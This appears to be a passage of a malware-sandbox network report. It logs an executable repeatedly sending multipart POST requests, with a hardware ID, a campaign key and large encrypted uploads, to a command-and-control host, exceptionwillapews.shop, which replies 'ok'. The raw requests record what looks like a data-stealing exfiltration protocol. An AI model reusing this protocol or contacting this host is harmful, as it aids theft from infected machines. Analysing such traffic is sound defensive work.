                                                                      2024-04-18 07:32:10 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 36 46 44 32 46 43 31 44 45 45 46 42 45 32 38 41 41 37 38 34 39 42 32 39 34 30 44 43 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8A16FD2FC1DEEFBE28AA7849B2940DC0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                                      2024-04-18 07:32:10 UTC2830OUTData Raw: 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f
                                                                      Data Ascii: 2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?
                                                                      2024-04-18 07:32:11 UTC816INHTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 07:32:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=bhqbp65if2llgqqt8amhfp97d2; expires=Mon, 12-Aug-2024 01:18:49 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0CUSZ%2BnFCdpfaGtoEQCCl%2FYGtOEV0Mgz1IjuXXf1NT4uW4Q7wXvXNGJLPWzZEdfpR0nGlJf0Ok%2Flx%2BVdajspSnYE%2BehTjXzfvmRhixx5bSf6xd4wYsYYlAKRQm1gl4r4vZPy6H6lgC1Yjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8762f59dec5417ff-ATL
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-04-18 07:32:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                      Data Ascii: fok 81.181.57.52
                                                                      2024-04-18 07:32:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449733104.21.44.104436988C:\Users\user\Desktop\5Dw2hTQmiB.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 07:32:11 UTC288OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8782
                                                                      Host: exceptionwillapews.shop
                                                                      2024-04-18 07:32:11 UTC8782OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 36 46 44 32 46 43 31 44 45 45 46 42 45 32 38 41 41 37 38 34 39 42 32 39 34 30 44 43 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8A16FD2FC1DEEFBE28AA7849B2940DC0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                                      2024-04-18 07:32:11 UTC808INHTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 07:32:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ij7c8hddc352hoekir63q47ai6; expires=Mon, 12-Aug-2024 01:18:50 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tvbH9z3OraUQqVpG089fLJyagRifHgK2YAnzzN9aH1axjxdjFZCu3AYTH7YlkLkljToqfy6LKUKSme0VvrpUzoznLmPbM4W5wViqDKyFf5kj9ReyWa5LSW%2FCPXb9mrfKaGBAUtSS0moUhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8762f5a36c264513-ATL
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-04-18 07:32:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                      Data Ascii: fok 81.181.57.52
                                                                      2024-04-18 07:32:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449734104.21.44.104436988C:\Users\user\Desktop\5Dw2hTQmiB.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 07:32:12 UTC289OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20435
                                                                      Host: exceptionwillapews.shop
                                                                      2024-04-18 07:32:12 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 36 46 44 32 46 43 31 44 45 45 46 42 45 32 38 41 41 37 38 34 39 42 32 39 34 30 44 43 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8A16FD2FC1DEEFBE28AA7849B2940DC0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                                      2024-04-18 07:32:12 UTC5104OUTData Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00
                                                                      Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                      2024-04-18 07:32:12 UTC810INHTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 07:32:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=cogk9pbrksa8e7pr3ds7h2r9af; expires=Mon, 12-Aug-2024 01:18:51 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OOqfaSdAFG5D87RtfRcZ8GcWT10Bv4scM8UiG5Kp7iJkCbzPGghAqm5xl2ddz8ILNkUxd8JIq1IREGLMYUNuyb3xo22WGF%2BdCc4UxAQdSg651bISPTqMQ077gKPkxTrY0vgckX5keK%2Fidw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8762f5a95b5f674f-ATL
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-04-18 07:32:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                      Data Ascii: fok 81.181.57.52
                                                                      2024-04-18 07:32:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449735104.21.44.104436988C:\Users\user\Desktop\5Dw2hTQmiB.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 07:32:13 UTC288OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 5436
                                                                      Host: exceptionwillapews.shop
                                                                      2024-04-18 07:32:13 UTC5436OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 36 46 44 32 46 43 31 44 45 45 46 42 45 32 38 41 41 37 38 34 39 42 32 39 34 30 44 43 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8A16FD2FC1DEEFBE28AA7849B2940DC0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                                      2024-04-18 07:32:13 UTC808INHTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 07:32:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=95av1o2i5bo53cuo41cf3br1ul; expires=Mon, 12-Aug-2024 01:18:52 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kEvzb2jcBR2O2auJYGoboqC9V7T7OEnnoTFJ6z6Jh1zUR5mkEY3UGXD2VQrNtsQZlhtSKdR7ggK%2FbuylFYo2qgMzeM4wUSm1ht8sjq8oe9y0CSRpUsuuB3pRzWvD4W13Ernvxqv4AbApKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8762f5aedd39b08e-ATL
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-04-18 07:32:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                      Data Ascii: fok 81.181.57.52
                                                                      2024-04-18 07:32:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.449736104.21.44.104436988C:\Users\user\Desktop\5Dw2hTQmiB.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 07:32:13 UTC288OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1391
                                                                      Host: exceptionwillapews.shop
                                                                      2024-04-18 07:32:13 UTC1391OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 36 46 44 32 46 43 31 44 45 45 46 42 45 32 38 41 41 37 38 34 39 42 32 39 34 30 44 43 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8A16FD2FC1DEEFBE28AA7849B2940DC0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                                      2024-04-18 07:32:14 UTC820INHTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 07:32:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=an14mr328lth6v13usj7n7dtio; expires=Mon, 12-Aug-2024 01:18:53 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLvk38t0WUIeEDF6Oy%2B5InlklQLWPTUKgT1JZQS2tmHxgCWs42FlhPsemWCpq38nOQyD2%2BvLz0BbJGtFX74l74d8vZmVDMi3e%2B25HiQ%2B%2Bb8NKuONUftmxj%2BXSmsh2wD55XUjJwB10%2FuL5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8762f5b3dc850d1a-ATL
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-04-18 07:32:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                      Data Ascii: fok 81.181.57.52
                                                                      2024-04-18 07:32:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.449737104.21.44.104436988C:\Users\user\Desktop\5Dw2hTQmiB.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 07:32:15 UTC290OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 570802
                                                                      Host: exceptionwillapews.shop
                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 36 46 44 32 46 43 31 44 45 45 46 42 45 32 38 41 41 37 38 34 39 42 32 39 34 30 44 43 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8A16FD2FC1DEEFBE28AA7849B2940DC0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: 1b 3a 82 f5 9f 8c 51 0c f0 7d 9f 43 4c 9f 18 a4 1d d9 3e 79 04 31 93 6e 63 c1 00 46 68 2e b3 2e 7f 4b e0 7d 64 4b 5b 0a 74 cd 2a 00 a9 73 9e ca e4 be 2e cf fc 8c 65 57 c9 c6 90 ed 35 77 f3 56 95 41 c6 f2 cd 13 9f 5f d6 7c 3a bb cb a3 7e 44 fb b3 c9 99 24 46 90 57 7e 60 df 09 cd b3 99 23 95 37 3d 0a 7c 3e d9 a3 98 5f de c9 f7 5f 02 86 03 3f 88 9d 04 15 2d 1c 4d f1 cb 9c ff ad f3 97 99 ad e6 7f bf 26 81 a2 fc 21 66 5d 86 7b 46 01 a0 bd f8 d5 7b 07 73 08 25 81 23 93 49 cf 59 5d 2d 70 d8 ce 4d 93 5f 95 a2 44 05 78 61 a3 17 d5 77 fa 63 a9 f5 79 44 32 e8 2b e5 2d f3 2e 17 50 de a4 7a 26 03 7b 2c 3e 41 c3 9d e9 4e 08 d1 51 79 58 2b f7 c5 13 92 b2 7a d6 84 55 4c 96 f7 9c 3f cb 44 1a c0 ca 45 55 d8 d8 81 c8 a1 23 b4 f0 9f ac ac 96 a8 65 43 5f 11 81 98 2e 8b 28 b9
                                                                      Data Ascii: :Q}CL>y1ncFh..K}dK[t*s.eW5wVA_|:~D$FW~`#7=|>__?-M&!f]{F{s%#IY]-pM_DxawcyD2+-.Pz&{,>ANQyX+zUL?DEU#eC_.(
                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: f2 2e 4e 56 fb 2f 0d ae b9 76 0a b2 ef 76 2f 7e 7c cc b8 fa e9 9c eb dc 8a 46 47 d3 03 3f 54 e5 cb 30 51 42 80 99 6b bb 98 a5 cc ca 0d 37 3c 99 d4 6e e1 b8 d7 b2 9f ec e6 aa c8 13 ef bf 60 9a 7a 7a 22 5c 3f 8b 69 12 17 18 1b 65 5c ad dd 57 77 c2 c6 43 dc ac f7 f7 1c ba 3d 77 1b 78 bd bd 3b f2 ce af 53 f5 c6 76 dd 8f 18 03 7b 7d 9d bf 09 12 f5 75 88 c9 04 5b 73 65 ec cb 4b c9 cc e4 2c 29 1d bb 28 d5 7e 68 e6 4c 6c 4c 4d f9 c7 4e f1 26 17 94 25 a0 9a ba 0e df b4 92 e2 17 59 7d 1f ad 3c 79 a6 5f 5f ec 52 3f 49 3d eb 51 f8 f5 e6 f3 2f 80 6e 9f 8a 4a c1 8b 79 34 f5 d4 68 48 df c7 f3 e7 fa a4 d1 fe 57 a5 28 d5 22 6d 36 b9 86 81 8d f3 e4 68 ca 48 89 9e 98 26 f9 1e 44 45 99 cb c1 1c a4 4c 8e d9 18 ee 7f a2 9b cb b1 3b 3e ed 31 d5 ea bf 0b a5 26 a5 04 86 3e 25 0b
                                                                      Data Ascii: .NV/vv/~|FG?T0QBk7<n`zz"\?ie\WwC=wx;Sv{}u[seK,)(~hLlLMN&%Y}<y__R?I=Q/nJy4hHW("m6hH&DEL;>1&>%
                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: b6 52 0c 50 42 fd ef 38 cd ff 4e 62 dc fe bf bd 7f 2f 7f 3c a2 05 2c 25 d9 fa 6c 81 cf ea 46 28 df f6 3d 02 32 b1 be f8 88 20 1e f6 11 44 ff 07 64 2e 04 c9 3a df 82 ea 0b c3 03 bd 18 3f 45 ba db 37 5d 1c c1 aa 57 86 38 08 2b 38 16 36 af 92 75 23 25 c7 fd 57 a8 61 9a 80 5f ca f0 a6 6e 86 9a 7c bc 2a 87 50 75 85 05 69 c5 6a af 07 23 e6 47 64 4e 0e 4b d3 65 8f 17 a7 8f 95 c6 91 70 1e 24 6f f4 af 83 19 b9 ca c9 c8 e2 03 11 81 28 b8 7a a1 0b c5 3a bf a0 5d 69 7c f5 3e 24 aa 66 81 eb ba 3b 48 2d e2 72 69 b7 80 f0 7d 61 c3 f8 eb dc 5c 4e 8b d5 82 5a 8e 73 7b b5 93 a2 aa 09 46 86 46 04 29 6e 21 ef d7 29 f5 01 13 a2 ed 6b c3 49 d4 4f 9f aa 02 af ec 11 6f b8 9e ee 8f c4 ee 99 ff 7d 40 45 3a d8 9a e3 bf d0 30 0f 3b 57 e0 ac d1 b1 40 68 b3 7e 3a 4f eb 69 10 c0 ee de
                                                                      Data Ascii: RPB8Nb/<,%lF(=2 Dd.:?E7]W8+86u#%Wa_n|*Puij#GdNKep$o(z:]i|>$f;H-ri}a\NZs{FF)n!)kIOo}@E:0;W@h~:Oi
                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: b1 0f 49 15 cc c5 fe 58 1b 71 fa 6b df 70 06 5c 13 04 c7 4e 77 9f 08 e3 46 4e 80 f6 cf 71 dd fe b5 af 5e 36 39 a5 d1 26 eb 2e f8 c8 ca 49 39 62 fe 64 e4 5d 8d 59 17 ea 55 2b ca 3c 6b 30 35 98 ff 0f cf b3 2e 2c b4 58 56 d0 21 63 bd bd bd c8 7c 36 58 5c b5 45 90 d1 71 1e d7 7f a1 3b fd 2c cd 1c f1 cb 0b 43 17 8f 06 66 05 12 b0 83 0c b8 6b 89 b8 f3 06 d0 be 87 84 da 7c b2 af e9 b7 18 a2 68 5d 31 31 6c 3c 67 2b 8c 58 51 d2 9f 3c 75 6c 1f 61 de c6 6a df e7 69 cb cb bb ef 68 8d f9 2e cf 25 bc 60 fa 1c f6 a1 ec fa a9 f4 4a 56 fc 5c d9 7c 8e 48 f9 94 da a1 ff 6b 2c 10 b4 9f 21 f0 fe ed 8d 5d 88 6d 9b 71 d1 07 e4 6e ca b2 9a 3b 0c 02 9c 10 6e 93 ea 80 1b f8 b5 6f 50 f2 b4 c8 82 20 5a 24 d4 59 aa f8 2a e8 be 85 49 39 84 41 38 d0 72 2e 79 92 cd a2 fe 08 52 08 08 c6
                                                                      Data Ascii: IXqkp\NwFNq^69&.I9bd]YU+<k05.,XV!c|6X\Eq;,Cfk|h]11l<g+XQ<ulajih.%`JV\|Hk,!]mqn;noP Z$Y*I9A8r.yR
